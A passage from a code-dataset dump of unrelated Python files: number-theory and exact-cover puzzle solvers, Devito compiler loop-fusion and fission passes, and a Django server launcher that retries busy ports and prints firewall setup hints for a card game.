#\n # for clazz in inspector.list_classes_filtered(fs, *directories):\n # print(clazz)\n\n\n\n\n\n","repo_name":"EHRI/rspub-core","sub_path":"rspub/util/test/test_plugg.py","file_name":"test_plugg.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"7415942506","text":"import sys\n\ninput = sys.stdin.readline\nl = list(range(10000 * 2 + 1))\nfor i in range(2, 10000 * 2 + 1):\n\tfor j in range(2, -(-len(l)//i)):\n\t\tl[i * j] = 0\nn = int(input())\nfor _ in range(n):\n\ta = int(input())\n\ti = 0\n\twhile not (l[a//2-i] and l[a//2+i]):\n\t\ti += 1\n\tprint(a//2-i, a//2+i)","repo_name":"mtak0235/helloPython","sub_path":"StepByStep/기본수학2/donghyun/9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"4101060882","text":"from collections import defaultdict\n\n\ndef to_string(entries):\n s = []\n for i in xrange(9):\n for j in xrange(9):\n s.append(str(entries[i][j]))\n return ''.join(s)\n\n\ndef parse(digits):\n M = [[0]*9 for _ in xrange(9)]\n for (i, d) in enumerate(digits):\n M[i//9][i % 9] = int(d)\n return M\n\n\ndef algorithmx(target, sets):\n solution = []\n\n Y = {}\n for i in xrange(len(sets)):\n Y[i] = list(sets[i])\n\n X = {j: set() for j in target}\n for i in Y:\n for j in Y[i]:\n X[j].add(i)\n\n def solve():\n if not X:\n yield [sets[i] for i in solution]\n else:\n c = min(X, key=lambda c: len(X[c]))\n\n for r in list(X[c]):\n solution.append(r)\n\n cols = []\n for j in Y[r]:\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].remove(i)\n cols.append(X.pop(j))\n\n for s in solve():\n yield s\n\n for j in reversed(Y[r]):\n X[j] = cols.pop()\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].add(i)\n\n solution.pop()\n\n return solve()\n\n\ndef algorithm_dlx(target, sets):\n solution = []\n\n Y = {}\n for i in xrange(len(sets)):\n Y[i] = list(sets[i])\n\n X = {j: set() for j in target}\n for i in Y:\n for j in Y[i]:\n X[j].add(i)\n\n def solve():\n if not X:\n yield [sets[i] for i in solution]\n else:\n c = min(X, key=lambda c: len(X[c]))\n\n for r in list(X[c]):\n solution.append(r)\n\n cols = []\n for j in Y[r]:\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].remove(i)\n cols.append(X.pop(j))\n\n for s in solve():\n yield s\n\n for j in reversed(Y[r]):\n X[j] = cols.pop()\n for i in X[j]:\n for k in Y[i]:\n if k != j:\n X[k].add(i)\n\n solution.pop()\n\n return solve()\n\n\nclass ExactCover(object):\n \"\"\"\n Class representing the Exact Cover problem.\n\n Given a collection S of subsets of the set X, does there exist a\n subcollection S' such that every element of X is contained in exactly one\n member of S'?\n \"\"\"\n def __init__(self, sets):\n self.sets = sets.copy()\n universe = set()\n\n for (key, value) in sets.iteritems():\n universe.update(value)\n\n self.universe = universe\n self.num_cols = len(universe)\n\n def __repr__(self):\n return \"Exact Cover Problem\"\n\n\nclass ExactCoverBinary(ExactCover):\n \"\"\"\n Class representing the Exact Cover problem.\n\n Given a matrix M with entries of 0 and 1, does there exist a subset of the\n rows of M which sum to the vector of all 1s?\n \"\"\"\n def __init__(self, integers):\n vectors = defaultdict(list)\n num_bits = 0\n\n for n in integers:\n least_set_bit = n & (-n)\n num_bits = max(num_bits, n.bit_length())\n vectors[least_set_bit].append(n)\n\n self.vectors = vectors\n self.num_bits = 
num_bits\n\n def number_of_solutions(self):\n \"\"\"\n Returns the number of exact covers. The algorithm is a memoized\n recursive backtracking method.\n \"\"\"\n vectors = self.vectors\n all_bits = 2**self.num_bits - 1\n cache = {all_bits: 1}\n\n def backtrack(covered):\n if covered in cache:\n return cache[covered]\n\n total = 0\n least_unset_bit = ~covered & (covered + 1)\n for v in vectors[least_unset_bit]:\n if (covered & v) == 0:\n total += backtrack(covered | v)\n\n cache[covered] = total\n return total\n\n total = backtrack(0)\n return total\n\n def solutions(self):\n all_bits = 2**self.num_bits - 1\n vectors = self.vectors\n stack = [(0, [])]\n\n while stack:\n (covered, used) = stack.pop()\n if covered == all_bits:\n yield used\n else:\n least_unset_bit = ~covered & (covered + 1)\n for v in vectors[least_unset_bit]:\n if (covered & v) == 0:\n stack.append((covered | v, used + [v]))\n\n\ndef langford_ints(n):\n L = []\n for p in xrange(1, n + 1):\n c = 1 << (3*n - p)\n l = 2*n - 1\n r = l - p - 1\n while r >= 0:\n b = c | (1 << l)\n b |= (1 << r)\n L.append(b)\n r -= 1\n l -= 1\n return L\n\n\ndef langford_pairings(n):\n ints = langford_ints(n)\n E = ExactCoverBinary(ints)\n num_sols = E.number_of_solutions()\n return num_sols // 2\n\n\ndef domino_ints(n):\n L = []\n for i in xrange(n*n):\n if i + n < n*n:\n L.append((1 << i) | (1 << (i + n)))\n\n if i + 1 < n*n and (i + 1) % n != 0:\n L.append((1 << i) | (1 << (i + 1)))\n\n return L\n\n\ndef domino_tilings(n):\n ints = domino_ints(n)\n E = ExactCoverBinary(ints)\n num_sols = E.number_of_solutions()\n return num_sols\n\n\ndef latin_square_ints(n):\n ints = []\n all_blocks = {}\n for i in xrange(n):\n all_blocks[i] = []\n for j in xrange(n):\n blocks = [[0]*n for _ in xrange(n)]\n blocks[j][i] = 1\n all_blocks[i].append(blocks)\n\n for p in xrange(n):\n for (i, a) in enumerate(all_blocks[p]):\n for (j, b) in enumerate(all_blocks[p]):\n t = []\n for s in a + b:\n t.extend(s)\n val = sum(2**(2*n*n - k - 1) for k in xrange(2*n*n) if t[k])\n ints.append((val << (n*n)) | (1 << (n*n - j*n - i - 1)))\n\n return ints\n\n\ndef sudoku_vectors(M):\n vectors = []\n block_idx = {\n (0, 0): 0,\n (0, 3): 1,\n (0, 6): 2,\n (3, 0): 3,\n (3, 3): 4,\n (3, 6): 5,\n (6, 0): 6,\n (6, 3): 7,\n (6, 6): 8\n }\n\n for row in range(9):\n for col in range(9):\n if M[row][col] == 0:\n digits = range(1, 10)\n else:\n digits = [M[row][col]]\n\n for digit in digits:\n entries = set()\n entries.add(\"{}O{}\".format(row, col))\n entries.add(\"{}R{}\".format(digit, row))\n entries.add(\"{}C{}\".format(digit, col))\n\n rr = row - (row % 3)\n cc = col - (col % 3)\n entries.add(\"{}B{}\".format(digit, block_idx[rr, cc]))\n\n vectors.append(entries)\n\n return vectors\n\n\ndef sudoku_dlx(a):\n M = parse(a)\n vecs = sudoku_vectors(M)\n target = set()\n for e in vecs:\n target.update(e)\n\n sol = algorithmx(target, vecs).next()\n\n for entry in sol:\n for e in entry:\n if e[1] == 'O':\n r = int(e[0])\n c = int(e[2])\n\n if e[1] == 'C':\n d = int(e[0])\n\n M[r][c] = d\n\n return to_string(M)\n","repo_name":"siegelzero/rosemary","sub_path":"rosemary/combinatorics/optimization/exact_cover.py","file_name":"exact_cover.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"8404616957","text":"from collections import Counter, defaultdict\nfrom itertools import groupby, product\n\nfrom devito.ir.clusters import Cluster, ClusterGroup, Queue\nfrom devito.ir.support import TILABLE, 
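`ExactCoverBinary.number_of_solutions` above memoizes on the bitmask of covered cells and always branches on the least unset bit, so every partial cover is reached through one canonical frontier. The same trick as a standalone counter for domino tilings of a 2x3 board; the board encoding is my own toy adaptation of the record's `domino_ints` (cell i is bit `1 << i`).

from functools import lru_cache

def count_covers(n_cells, rows):
    # Count exact covers of n_cells bits by the given row bitmasks.
    full = (1 << n_cells) - 1
    by_low = {}
    for r in rows:                        # index rows by their lowest set bit
        by_low.setdefault(r & (-r), []).append(r)

    @lru_cache(maxsize=None)
    def go(covered):
        if covered == full:
            return 1
        low = ~covered & (covered + 1)    # least unset bit, as in the record
        return sum(go(covered | r)
                   for r in by_low.get(low, [])
                   if covered & r == 0)

    return go(0)

# Dominoes on a 2 x 3 board, cells numbered row-major: 0 1 2 / 3 4 5.
rows = []
for i in range(6):
    if i + 3 < 6:
        rows.append((1 << i) | (1 << (i + 3)))    # vertical piece
    if i % 3 != 2:
        rows.append((1 << i) | (1 << (i + 1)))    # horizontal piece
print(count_covers(6, rows))   # 3 tilings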
SEQUENTIAL, Scope\nfrom devito.passes.clusters.utils import cluster_pass\nfrom devito.symbolics import pow_to_mul\nfrom devito.tools import DAG, Stamp, as_tuple, flatten, frozendict, timed_pass\nfrom devito.types import Symbol\nfrom devito.types.grid import MultiSubDimension\n\n__all__ = ['Lift', 'fuse', 'optimize_pows', 'extract_increments',\n 'fission', 'optimize_msds']\n\n\nclass Lift(Queue):\n\n \"\"\"\n Remove invariant Dimensions from Clusters to avoid redundant computation.\n\n Notes\n -----\n This is analogous to the compiler transformation known as\n \"loop-invariant code motion\".\n \"\"\"\n\n @timed_pass(name='lift')\n def process(self, elements):\n return super(Lift, self).process(elements)\n\n def callback(self, clusters, prefix):\n if not prefix:\n # No iteration space to be lifted from\n return clusters\n\n hope_invariant = prefix[-1].dim._defines\n outer = set().union(*[i.dim._defines for i in prefix[:-1]])\n\n lifted = []\n processed = []\n for n, c in enumerate(clusters):\n # Increments prevent lifting\n if c.has_increments:\n processed.append(c)\n continue\n\n # Is `c` a real candidate -- is there at least one invariant Dimension?\n if any(d._defines & hope_invariant for d in c.used_dimensions):\n processed.append(c)\n continue\n\n impacted = set(processed) | set(clusters[n+1:])\n\n # None of the Functions appearing in a lifted Cluster can be written to\n if any(c.functions & set(i.scope.writes) for i in impacted):\n processed.append(c)\n continue\n\n # All of the inner Dimensions must appear in the write-to region\n # otherwise we would violate data dependencies. Consider\n #\n # 1) 2) 3)\n # for i for i for i\n # for x for x for x\n # r = f(a[x]) for y for y\n # r[x] = f(a[x, y]) r[x, y] = f(a[x, y])\n #\n # In 1) and 2) lifting is infeasible; in 3) the statement can be lifted\n # outside the `i` loop as `r`'s write-to region contains both `x` and `y`\n xed = {d._defines for d in c.used_dimensions if d not in outer}\n if not all(i & set(w.dimensions) for i, w in product(xed, c.scope.writes)):\n processed.append(c)\n continue\n\n # The contracted iteration and data spaces\n key = lambda d: d not in hope_invariant\n ispace = c.ispace.project(key).reset()\n\n # Some properties are dropped\n properties = {d: v for d, v in c.properties.items() if key(d)}\n properties = {d: v - {TILABLE} for d, v in properties.items()}\n\n lifted.append(c.rebuild(ispace=ispace, properties=properties))\n\n return lifted + processed\n\n\nclass Fusion(Queue):\n\n \"\"\"\n Fuse Clusters with compatible IterationSpace.\n \"\"\"\n\n def __init__(self, toposort, options=None):\n options = options or {}\n\n self.toposort = toposort\n self.fusetasks = options.get('fuse-tasks', False)\n\n super().__init__()\n\n def _make_key_hook(self, cgroup, level):\n assert level > 0\n assert len(cgroup.guards) == 1\n return (tuple(cgroup.guards[0].get(i.dim) for i in cgroup.itintervals[:level-1]),)\n\n def process(self, clusters):\n cgroups = [ClusterGroup(c, c.itintervals) for c in clusters]\n cgroups = self._process_fdta(cgroups, 1)\n clusters = ClusterGroup.concatenate(*cgroups)\n return clusters\n\n def callback(self, cgroups, prefix):\n # Toposort to maximize fusion\n if self.toposort:\n clusters = self._toposort(cgroups, prefix)\n else:\n clusters = ClusterGroup(cgroups)\n\n # Fusion\n processed = []\n for k, g in groupby(clusters, key=self._key):\n maybe_fusible = list(g)\n\n if len(maybe_fusible) == 1:\n processed.extend(maybe_fusible)\n else:\n try:\n # Perform fusion\n fused = 
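The Lift pass's docstring above compares it to loop-invariant code motion. For readers unfamiliar with the classical transformation, here is the idea on plain Python loops; this toy is unrelated to Devito's Cluster machinery.

def before(a, b, xs):
    out = []
    for x in xs:
        out.append(x + a * b)   # a * b is invariant yet recomputed every iteration
    return out

def after(a, b, xs):
    inv = a * b                 # hoisted ("lifted") out of the loop once
    return [x + inv for x in xs]

assert before(2, 3, [1, 2]) == after(2, 3, [1, 2]) == [7, 8]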
Cluster.from_clusters(*maybe_fusible)\n processed.append(fused)\n except ValueError:\n # We end up here if, for example, some Clusters have same\n # iteration Dimensions but different (partial) orderings\n processed.extend(maybe_fusible)\n\n return [ClusterGroup(processed, prefix)]\n\n def _key(self, c):\n # Two Clusters/ClusterGroups are fusion candidates if their key is identical\n\n key = (frozenset(c.itintervals), c.guards)\n\n # We allow fusing Clusters/ClusterGroups even in presence of WaitLocks and\n # WithLocks, but not with any other SyncOps\n if isinstance(c, Cluster):\n sync_locks = (c.sync_locks,)\n else:\n sync_locks = c.sync_locks\n for i in sync_locks:\n mapper = defaultdict(set)\n for k, v in i.items():\n for s in v:\n if s.is_WaitLock or \\\n (self.fusetasks and s.is_WithLock):\n mapper[k].add(type(s))\n else:\n mapper[k].add(s)\n mapper[k] = frozenset(mapper[k])\n mapper = frozendict(mapper)\n key += (mapper,)\n\n return key\n\n def _toposort(self, cgroups, prefix):\n # Are there any ClusterGroups that could potentially be fused? If\n # not, do not waste time computing a new topological ordering\n counter = Counter(self._key(cg) for cg in cgroups)\n if not any(v > 1 for it, v in counter.most_common()):\n return ClusterGroup(cgroups)\n\n # Similarly, if all ClusterGroups have the same exact prefix and\n # use the same form of synchronization (if any at all), no need to\n # attempt a topological sorting\n if len(counter.most_common()) == 1:\n return ClusterGroup(cgroups)\n\n dag = self._build_dag(cgroups, prefix)\n\n def choose_element(queue, scheduled):\n # Heuristic: let `k0` be the key of the last scheduled node; then out of\n # the possible schedulable nodes we pick the one with key `k1` such that\n # `max_i : k0[:i] == k1[:i]` (i.e., the one with \"the most similar key\")\n if not scheduled:\n return queue.pop()\n key = self._key(scheduled[-1])\n for i in reversed(range(len(key) + 1)):\n candidates = [e for e in queue if self._key(e)[:i] == key[:i]]\n try:\n # Ensure stability\n e = min(candidates, key=lambda i: cgroups.index(i))\n except ValueError:\n continue\n queue.remove(e)\n return e\n assert False\n\n return ClusterGroup(dag.topological_sort(choose_element))\n\n def _build_dag(self, cgroups, prefix):\n \"\"\"\n A DAG representing the data dependences across the ClusterGroups within\n a given scope.\n \"\"\"\n prefix = {i.dim for i in as_tuple(prefix)}\n\n dag = DAG(nodes=cgroups)\n for n, cg0 in enumerate(cgroups):\n for cg1 in cgroups[n+1:]:\n # A Scope to compute all cross-ClusterGroup anti-dependences\n rule = lambda i: i.is_cross\n scope = Scope(exprs=cg0.exprs + cg1.exprs, rules=rule)\n\n # Optimization: we exploit the following property:\n # no prefix => (edge <=> at least one (any) dependence)\n # to jump out of this potentially expensive loop as quickly as possible\n if not prefix and any(scope.d_all_gen()):\n dag.add_edge(cg0, cg1)\n\n # Anti-dependences along `prefix` break the execution flow\n # (intuitively, \"the loop nests are to be kept separated\")\n # * All ClusterGroups between `cg0` and `cg1` must precede `cg1`\n # * All ClusterGroups after `cg1` cannot precede `cg1`\n elif any(i.cause & prefix for i in scope.d_anti_gen()):\n for cg2 in cgroups[n:cgroups.index(cg1)]:\n dag.add_edge(cg2, cg1)\n for cg2 in cgroups[cgroups.index(cg1)+1:]:\n dag.add_edge(cg1, cg2)\n break\n\n # Any anti- and iaw-dependences impose that `cg1` follows `cg0`\n # while not being its immediate successor (unless it already is),\n # to avoid they are fused together (thus 
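Fusion.callback above leans on itertools.groupby, which only merges *adjacent* items sharing a key; that is exactly why the optional toposort step exists, reordering Clusters so that fusible ones become neighbors. The mechanism in isolation, with tuples standing in for Clusters:

from itertools import groupby

def fuse_adjacent(items, key):
    fused = []
    for k, run in groupby(items, key=key):   # maximal runs of equal keys
        run = list(run)
        fused.append(run[0] if len(run) == 1 else ('fused', run))
    return fused

items = [('a', 1), ('b', 2), ('a', 3)]
key = lambda t: t[0]
print(fuse_adjacent(items, key))
# [('a', 1), ('b', 2), ('a', 3)]  -- the two 'a' items are not adjacent
print(fuse_adjacent(sorted(items, key=key), key))
# [('fused', [('a', 1), ('a', 3)]), ('b', 2)]  -- reordering enabled fusion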
breaking the dependence)\n # TODO: the \"not being its immediate successor\" part *seems* to be\n # a work around to the fact that any two Clusters characterized\n # by anti-dependence should have been given a different stamp,\n # and same for guarded Clusters, but that is not the case (yet)\n elif any(scope.d_anti_gen()) or\\\n any(i.is_iaw for i in scope.d_output_gen()):\n dag.add_edge(cg0, cg1)\n index = cgroups.index(cg1) - 1\n if index > n and self._key(cg0) == self._key(cg1):\n dag.add_edge(cg0, cgroups[index])\n dag.add_edge(cgroups[index], cg1)\n\n # Any flow-dependences along an inner Dimension (i.e., a Dimension\n # that doesn't appear in `prefix`) impose that `cg1` follows `cg0`\n elif any(not (i.cause and i.cause & prefix) for i in scope.d_flow_gen()):\n dag.add_edge(cg0, cg1)\n\n # Clearly, output dependences must be honored\n elif any(scope.d_output_gen()):\n dag.add_edge(cg0, cg1)\n\n return dag\n\n\n@timed_pass()\ndef fuse(clusters, toposort=False, options=None):\n \"\"\"\n Clusters fusion.\n\n If ``toposort=True``, then the Clusters are reordered to maximize the likelihood\n of fusion; the new ordering is computed such that all data dependencies are honored.\n \"\"\"\n return Fusion(toposort, options).process(clusters)\n\n\n@cluster_pass(mode='all')\ndef optimize_pows(cluster, *args):\n \"\"\"\n Convert integer powers into Muls, such as ``a**2 => a*a``.\n \"\"\"\n return cluster.rebuild(exprs=[pow_to_mul(e) for e in cluster.exprs])\n\n\n@cluster_pass(mode='sparse')\ndef extract_increments(cluster, sregistry, *args):\n \"\"\"\n Extract the RHSs of non-local tensor expressions performing an associative\n and commutative increment, and assign them to temporaries.\n \"\"\"\n processed = []\n for e in cluster.exprs:\n if e.is_Increment and e.lhs.function.is_Input:\n handle = Symbol(name=sregistry.make_name(), dtype=e.dtype).indexify()\n if e.rhs.is_Number or e.rhs.is_Symbol:\n extracted = e.rhs\n else:\n extracted = e.rhs.func(*[i for i in e.rhs.args if i != e.lhs])\n processed.extend([e.func(handle, extracted, is_Increment=False),\n e.func(e.lhs, handle)])\n else:\n processed.append(e)\n\n return cluster.rebuild(processed)\n\n\nclass Fission(Queue):\n\n \"\"\"\n Implement Clusters fission. 
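`_toposort` above hands `dag.topological_sort` a `choose_element` heuristic that breaks ties among schedulable nodes by key similarity. A sketch of that pluggable-chooser idea on Kahn's algorithm; this is an assumption about the helper's general shape, not devito.tools.DAG itself.

def topological_sort(nodes, edges, choose):
    # edges is a set of (u, v) pairs meaning u must precede v.
    indeg = {n: 0 for n in nodes}
    succ = {n: [] for n in nodes}
    for u, v in edges:
        indeg[v] += 1
        succ[u].append(v)
    queue = [n for n in nodes if indeg[n] == 0]
    order = []
    while queue:
        n = choose(queue, order)        # heuristic picks among ready nodes
        queue.remove(n)
        order.append(n)
        for m in succ[n]:
            indeg[m] -= 1
            if indeg[m] == 0:
                queue.append(m)
    assert len(order) == len(nodes), "cycle detected"
    return order

# Prefer the ready node most similar to the last scheduled one (same letter).
choose = lambda q, done: next((n for n in q if done and n[0] == done[-1][0]), q[0])
print(topological_sort(['a1', 'b1', 'a2'], {('a1', 'a2')}, choose))
# ['a1', 'a2', 'b1'] -- a2 lands right after a1, maximizing later fusion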
For more info refer to fission.__doc__.\n \"\"\"\n\n def callback(self, clusters, prefix):\n if not prefix or len(clusters) == 1:\n return clusters\n\n d = prefix[-1].dim\n\n # Do not waste time if definitely illegal\n if any(SEQUENTIAL in c.properties[d] for c in clusters):\n return clusters\n\n # Do not waste time if definitely nothing to do\n if all(len(prefix) == len(c.itintervals) for c in clusters):\n return clusters\n\n # Analyze and abort if fissioning would break a dependence\n scope = Scope(flatten(c.exprs for c in clusters))\n if any(d._defines & dep.cause or dep.is_reduce(d) for dep in scope.d_all_gen()):\n return clusters\n\n processed = []\n for (it, guards), g in groupby(clusters, key=lambda c: self._key(c, prefix)):\n group = list(g)\n\n if any(SEQUENTIAL in c.properties[it.dim] for c in group) or guards:\n # Heuristic: no gain from fissioning if unable to ultimately\n # increase the number of collapsable iteration spaces, hence give up\n processed.extend(group)\n else:\n stamp = Stamp()\n for c in group:\n ispace = c.ispace.lift(d, stamp)\n processed.append(c.rebuild(ispace=ispace))\n\n return processed\n\n def _key(self, c, prefix):\n try:\n index = len(prefix)\n dims = tuple(i.dim for i in prefix)\n\n it = c.itintervals[index]\n guards = frozendict({d: v for d, v in c.guards.items() if d in dims})\n\n return (it, guards)\n except IndexError:\n return (None, c.guards)\n\n\n@timed_pass()\ndef fission(clusters):\n \"\"\"\n Clusters fission.\n\n Currently performed in the following cases:\n\n * Trade off data locality for parallelism, e.g.\n\n .. code-block::\n\n for x for x\n for y1 for y1\n .. ..\n for y2 --> for x\n .. for y2\n ..\n \"\"\"\n return Fission().process(clusters)\n\n\nclass MSDOptimizer(Queue):\n\n \"\"\"\n Implement MultiSubDomains optimization.\n\n Currently, the following optimizations are performed:\n\n * Removal of redundant thicknesses assignments. 
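The diagram in fission's docstring, written out on plain Python loops. The split is legal here precisely because the two inner loops write disjoint arrays, which is what the Scope dependence check in Fission.callback verifies before lifting.

def before(n, m):
    a = [[0] * m for _ in range(n)]
    b = [[0] * m for _ in range(n)]
    for x in range(n):          # one x loop carrying two independent y loops
        for y1 in range(m):
            a[x][y1] = x + y1
        for y2 in range(m):
            b[x][y2] = x * y2
    return a, b

def after(n, m):                # fissioned: two separate, parallel-friendly nests
    a = [[x + y1 for y1 in range(m)] for x in range(n)]
    b = [[x * y2 for y2 in range(m)] for x in range(n)]
    return a, b

assert before(3, 4) == after(3, 4)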
These stem from Eqs\n defined over the same MultiSubDomain in the very same loop nest.\n The redundant assignments obviously do not impact correctness,\n but they may affect other optimizations, such as fusion.\n \"\"\"\n\n def callback(self, clusters, prefix):\n if not prefix or any(isinstance(i.dim, MultiSubDimension) for i in prefix):\n return clusters\n\n msds = {d for d in set().union(*[c.dimensions for c in clusters])\n if isinstance(d, MultiSubDimension)}\n if not msds:\n return clusters\n\n # Remove redundant thicknesses assignments\n\n thicknesses = set().union(*[list(i._thickness_map) for i in msds])\n candidates = [c for c in clusters if set(c.scope.writes) & thicknesses]\n\n # First of all, make sure we analyze all and only the thicknesses assignments\n # at the same depth\n d = prefix[-1].dim\n if any(c.itintervals[-1].dim is not d for c in candidates):\n return clusters\n\n # Then, attempt extirpation of redundancies\n schedulable = set(thicknesses)\n processed = []\n for c in clusters:\n if c in candidates:\n exprs = []\n for e in c.exprs:\n try:\n schedulable.remove(e.lhs)\n exprs.append(e)\n except KeyError:\n # Already scheduled, no-op\n pass\n if exprs:\n processed.append(c.rebuild(exprs=exprs))\n else:\n processed.append(c)\n\n # Sanity check\n assert len(schedulable) == 0\n\n return processed\n\n\n@timed_pass()\ndef optimize_msds(clusters):\n \"\"\"\n Optimize clusters defined over MultiSubDomains.\n \"\"\"\n return MSDOptimizer().process(clusters)\n","repo_name":"felipeaugustogudes/paper-fwi","sub_path":"devito/devito/passes/clusters/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":16014,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"2496941255","text":"from collections import abc\nimport errno\nimport os\nimport random\nimport re\nimport socket\nimport socketserver\nimport sys\n\n\nimport django.core.management\nfrom django.core.management.commands import runserver\nfrom django.core.servers import basehttp\n\nRE_PORT = re.compile(r'\\d+$')\ndefault_port = 8778\n\nclass ManagementUtility(django.core.management.ManagementUtility):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.command_ = None\n\n def fetch_command(self, *args, **kwargs):\n self.command_ = super().fetch_command(*args, **kwargs)\n return self.command_\n\nutility = ManagementUtility(sys.argv)\n\nclass PortChanger(abc.Callable):\n def __init__(self, method, retries = 10, hop = 10):\n assert callable(method)\n self.method = method\n assert 0 < retries\n self.retries = retries\n assert 0 < hop <= default_port / retries\n self.hop = hop\n self.busy = set()\n self.port = None\n\n def _hop(self, port):\n self.busy.add(port)\n incr = random.randrange(-self.hop, self.hop)\n incr += (1 if 0 <= incr else 0)\n port += incr\n while port in self.busy:\n port -= int(incr / abs(incr))\n return port\n\n def __call__(self, addr, port, *args, **kwargs):\n stdout = utility.command_.stdout if utility.command_ else sys.stdout\n while True:\n try:\n return self.method(addr, port, *args, **kwargs)\n except socket.error as e:\n if e.errno == errno.EACCES:\n stdout.write(\"No access to port %d, retrying ...\" % port) \n elif e.errno == errno.EADDRINUSE:\n stdout.write(\"Port %d busy, retrying ...\" % port)\n else: \n raise\n if 0 >= self.retries:\n raise\n self.retries -= 1\n self.port = port = self._hop(port)\n stdout.write(\"Starting development server at http://%s:%s/\"\n % (addr, port))\n\nclass 
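PortChanger above re-invokes `basehttp.run` with randomized port hops whenever binding fails with EACCES or EADDRINUSE. The core retry loop reduced to a raw socket; the `bind_with_retry` name and the deterministic +1 hop policy are mine, the record randomizes the hop instead.

import errno
import socket

def bind_with_retry(addr, port, retries=10, hop=1):
    for attempt in range(retries + 1):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.bind((addr, port))
            return s, port
        except OSError as e:
            s.close()
            if e.errno not in (errno.EADDRINUSE, errno.EACCES) or attempt == retries:
                raise               # a different failure, or out of retries
            port += hop             # try the next port
    raise AssertionError("unreachable")

sock, port = bind_with_retry("127.0.0.1", 8778)   # 8778 is the record's default
print("bound to port", port)
sock.close()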
Prompter(abc.Callable):\n def __init__(self, obj, method):\n self.method = getattr(obj, method)\n self.restore = (obj, method)\n\n def __call__(self, *args, **kwargs):\n command = utility.command_\n if command:\n stdout = command.stdout\n protocol = command.protocol\n addr = '[%s]' % command.addr if command._raw_ipv6 else command.addr\n port = basehttp.run.port if isinstance(basehttp.run, PortChanger) else None\n port = port or command.port\n ports = { 'https': 443, 'http': 80 }\n suffix = '' if port == ports.get(protocol) else ':%s' % port\n if addr == ('[::]' if command.use_ipv6 else '0.0.0.0'):\n addr = '[::1]' if command.use_ipv6 else '127.0.0.1'\n stdout.write(\n '\\nTo start a game, point your browser at\\n %s://%s%s/\\n'\n 'To allow remote players to join, open port %s on your firewall,\\n'\n 'e.g. on Linux:\\n'\n ' sudo %s -A INPUT -p tcp -m tcp --dport %s -j ACCEPT\\n'\n '(the above command may need changes to work with existing\\n'\n ' iptables configuration or limit remote players\\' addresses)\\n\\n'\n % (protocol, addr, suffix, port,\n 'ip6tables' if command.use_ipv6 else 'iptables', port)\n )\n setattr(*self.restore, self.method)\n return self.method(*args, **kwargs)\n\ndef defaultServer(command):\n command = command.lower()\n if '.py' == command[-3:]:\n command = command[:-3]\n if 'runserver' != command:\n return\n sys.argv[0] = command\n os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"cards_web.settings\"\n fixport = v6 = False\n addrport = None\n i = 1\n while i < len(sys.argv):\n arg = sys.argv[i]\n i += 1\n if arg.lower() == '--fixport':\n fixport = True\n i -= 1\n sys.argv.pop(i)\n elif arg == '--':\n if i < len(sys.argv):\n addrport = sys.argv[i]\n break\n elif not arg.startswith('-'):\n addrport = arg\n elif arg == '--ipv6' or arg == '-6':\n v6 = True \n sys.argv.insert(1, '--noreload')\n sys.argv.insert(0, realpath)\n if not fixport:\n import importlib\n basehttp.run = PortChanger(basehttp.run)\n importlib.reload(runserver)\n runserver.Command.default_port = default_port\n default_addr = '0.0.0.0'\n if hasattr(runserver.Command, 'default_addr'):\n setattr(runserver.Command, 'default_addr', default_addr)\n elif v6:\n pass\n elif not addrport:\n addrport = '%s:%s' % (default_addr, runserver.Command.default_port)\n sys.argv.append(addrport)\n elif RE_PORT.match(addrport):\n sys.argv.remove(addrport)\n addrport = default_addr + ':' + addrport\n sys.argv.append(addrport)\n default_addr = '::'\n if hasattr(runserver.Command, 'default_addr_ipv6'):\n setattr(runserver.Command, 'default_addr_ipv6', default_addr)\n elif not v6:\n pass\n elif not addrport:\n addrport = '%s:%s' % (default_addr, runserver.Command.default_port)\n sys.argv.append(addrport)\n elif RE_PORT.match(addrport):\n sys.argv.remove(addrport)\n addrport = default_addr + ':' + addrport\n sys.argv.append(addrport)\n prompter = Prompter(\n socketserver.BaseServer,\n 'serve_forever'\n )\n def patch(self, *args, **kwargs):\n prompter(self, *args, **kwargs)\n socketserver.BaseServer.serve_forever = patch\n\nif __name__ == \"__main__\":\n\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cards_web.settings\")\n\n basedir, command = os.path.split(os.path.abspath(__file__))\n realpath = os.path.realpath(__file__)\n projdir = os.path.dirname(realpath)\n defaultServer(command)\n if not os.path.samefile(basedir, projdir):\n addpath = []\n for entry in os.listdir(basedir):\n if '.src' == entry[-4:].lower():\n entry = os.path.join(basedir, entry)\n if os.path.isdir(entry) and (\n not sys.path or\n not 
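Prompter above swaps itself in for `socketserver.BaseServer.serve_forever`, prints its banner on first use, then restores the original via `setattr(*self.restore, self.method)`. The same patch-once pattern in miniature; `patch_once` and `Demo` are hypothetical names, not the record's classes.

def patch_once(obj, name, before):
    original = getattr(obj, name)
    def wrapper(*args, **kwargs):
        before()
        setattr(obj, name, original)   # self-unhook after the first call
        return original(*args, **kwargs)
    setattr(obj, name, wrapper)

class Demo:
    def serve(self):
        return "serving"

patch_once(Demo, "serve", lambda: print("first call: show banner"))
d = Demo()
print(d.serve())   # banner printed, then 'serving'
print(d.serve())   # original restored: no banner this time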
